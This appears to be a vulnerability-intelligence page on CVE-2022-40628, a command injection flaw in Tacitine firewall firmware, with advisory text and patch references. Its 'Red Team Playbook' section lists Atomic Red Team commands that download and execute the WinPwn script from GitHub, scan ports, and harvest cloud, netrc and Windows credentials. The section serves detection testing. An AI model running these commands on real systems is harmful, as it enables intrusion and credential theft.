CVE-2022-40628
Overview
This vulnerability is a command injection flaw arising from improper control of code generation within the web-based management interface of Tacitine Firewall. Specifically, the affected component fails to sanitize or validate user-supplied input in HTTP requests, allowing arbitrary command execution on the underlying operating system. The issue impacts all versions of EN6200-PRIME QUAD-35 and EN6200-PRIME QUAD-100 firmware from 19.1.1 through 22.20.1 inclusive.
Vulnerability Description
This vulnerability exists in Tacitine Firewall, all versions of EN6200-PRIME QUAD-35 and EN6200-PRIME QUAD-100 between 19.1.1 to 22.20.1 (inclusive), due to improper control of code generation in the Tacitine Firewall web-based management interface. An unauthenticated remote attacker could exploit this vulnerability by sending a specially crafted http request on the targeted device. Successful exploitation of this vulnerability could allow an unauthenticated remote attacker to execute arbitrary commands on the targeted device.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary commands on the targeted Tacitine Firewall device, potentially compromising device integrity and confidentiality. No authentication or user interaction is required (AV:N/AC:L/PR:N/UI:N), enabling attackers with network access to gain control over firewall functions. This can lead to unauthorized network access, disruption of firewall services, or lateral movement within the protected network environment.
Solution
Tacitine has released security updates addressing this vulnerability for EN6200-PRIME QUAD-35 and EN6200-PRIME QUAD-100 firmware versions beyond 22.20.1. Administrators should apply the latest firmware patches as detailed in the advisory available at https://tacitine.com/newdownload/CVE-2022-40628.pdf. The CERT-In advisory (CIVN-2022-0363) also provides guidance on mitigation steps and patch deployment procedures specific to affected devices.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Tacitine Firewall's web-based management interface stems from improper control of code generation, which allows for the execution of arbitrary commands by an unauthenticated remote attacker. This flaw exists in specific firmware versions of the EN6200-PRIME QUAD-35 and EN6200-PRIME QUAD-100 devices. When an attacker sends a specially crafted HTTP request, they can manipulate the system's behavior, leading to unauthorized command execution. The lack of proper authentication checks in the management interface exacerbates the issue, as it permits attackers to exploit the vulnerability without needing valid credentials.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could target devices directly exposed to the internet or those within a less secure internal network. By sending crafted requests, the attacker can gain control over the firewall, potentially altering its configuration, intercepting traffic, or even deploying malware within the network. Scenarios may include an attacker gaining access to sensitive data, disrupting services, or using the compromised device as a foothold to launch further attacks within the network. The ease of exploitation, combined with the high impact of potential outcomes, makes this vulnerability particularly concerning for organizations relying on these firewall devices.
The real-world impact of this vulnerability can be severe, especially for businesses that depend on the affected firewall models for their network security. Successful exploitation could lead to unauthorized access to critical infrastructure, data breaches, and significant operational disruptions. The financial repercussions of such incidents can be substantial, including costs associated with incident response, recovery, and potential legal liabilities. Furthermore, the reputational damage resulting from a security breach can lead to loss of customer trust and market share, compounding the overall business risk.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the firmware of affected devices is crucial, as vendors often release patches to address known vulnerabilities. Network segmentation can help limit the exposure of sensitive devices to the internet, reducing the attack surface. Additionally, organizations should employ intrusion detection systems (IDS) to monitor for unusual traffic patterns or unauthorized access attempts. Conducting regular security assessments and penetration testing can also help identify potential weaknesses in the network configuration and improve overall security posture.
In conclusion, the vulnerability present in the Tacitine Firewall's management interface poses a significant threat to organizations utilizing the affected models. The potential for remote command execution by unauthenticated attackers highlights the need for robust security measures and proactive management of network devices. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves to defend against such vulnerabilities and mitigate associated risks effectively.
The EPSS score for CVE-2022-40628 has increased by approximately one-third, reflecting a moderate rise in the likelihood of exploitation as assessed by CSURFACE threat intelligence. Although no new exploit techniques or active campaigns have been detected by our telemetry, this upward adjustment signals growing interest or potential preparatory activity among threat actors targeting Tacitine Firewall devices. The stability of the 7-day trend suggests this is not a sudden spike but rather a gradual increase in risk. For defenders, this change underscores the importance of maintaining vigilance and monitoring for emerging exploit attempts, as the vulnerability remains a critical vector for unauthenticated remote code execution. While the absence of confirmed exploitation limits immediate urgency, the elevated EPSS score warrants heightened awareness and prioritization within vulnerability management workflows to anticipate possible future exploitation scenarios.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Tacitine | En6200-Prime Quad-35 Firmware | All |
cpe:2.3:o:tacitine:en6200-prime_quad-35_firmware:*:*:*:*:*:*:*:*
|
|
|
Tacitine | En6200-Prime Quad-100 Firmware | All |
cpe:2.3:o:tacitine:en6200-prime_quad-100_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-40628 |
| cert-in.org.in |
GitHub CVE
x_refsource_MISC
|
https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2022-0363 |
| tacitine.com |
GitHub CVE
x_refsource_MISC
|
https://tacitine.com/newdownload/CVE-2022-40628.pdf |